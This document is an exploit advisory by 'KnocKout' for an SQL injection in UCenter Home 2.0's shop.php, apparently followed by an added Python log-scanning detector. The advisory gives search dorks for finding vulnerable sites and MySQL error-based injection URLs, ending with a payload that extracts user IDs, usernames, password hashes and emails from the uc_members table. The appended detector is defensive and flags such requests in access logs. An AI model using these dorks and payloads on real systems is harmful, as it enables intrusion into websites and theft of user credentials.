__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability Type : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.
For Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.
Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.
Use hex conversion, and edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
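
Detection-side example, added here and not part of the original advisory or of UCenter Home: it scans web access logs for requests to shop.php whose shopid value is not a plain integer, and separately flags the error-based markers seen in the strings above. Assumptions: combined-format access logs, legitimate shopid values are always integers (as in shopid=253), and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers of the MySQL error-based technique shown in the advisory strings.
ERROR_BASED = re.compile(
    r"floor\s*\(\s*rand\s*\(|information_schema|group\s+by", re.I)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return 'ok', 'non_numeric' or 'error_based_sqli' for one log line."""
    m = REQUEST.search(log_line)
    if not m:
        return "ok"
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return "ok"
    # parse_qs URL-decodes values, so %20 and + both become spaces.
    params = parse_qs(url.query, keep_blank_values=True)
    worst = "ok"
    for value in params.get("shopid", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # the only shape a legitimate shop id takes
        if ERROR_BASED.search(value):
            return "error_based_sqli"
        worst = "non_numeric"
    return worst

def scan(lines):
    """Return (line_number, verdict) for every line that is not 'ok'."""
    return [(i, v) for i, line in enumerate(lines, 1)
            if (v := classify(line)) != "ok"]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] '
    '"GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 310',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20'
    'count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.'
    'tables%20group%20by%20x)a) HTTP/1.1" 200 412',
    '198.51.100.2 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /index.php?shopid=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(lineno, verdict)
```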